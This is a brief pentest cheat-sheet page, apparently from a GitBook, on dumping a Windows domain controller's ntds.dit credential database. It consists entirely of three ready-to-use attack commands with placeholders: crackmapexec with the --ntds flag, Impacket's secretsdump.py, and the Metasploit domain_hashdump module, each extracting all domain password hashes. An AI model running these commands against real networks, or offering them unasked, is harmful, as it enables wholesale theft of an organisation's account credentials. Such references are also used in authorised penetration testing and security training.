# Domain Admin

## Dump ntds.dit

{% tabs %}
{% tab title="crackmapexec" %}

```
cme smb <dc-ip> -u <user> -p <password> -d <domain> --ntds
```

{% endtab %}

{% tab title="secretsdump" %}

```
secretsdump.py '<domain>/<user>:<pass>'@<ip>
```

{% endtab %}

{% tab title="metasploit" %}

```
windows/gather/credentials/domain_hashdump
```

{% endtab %}
{% endtabs %}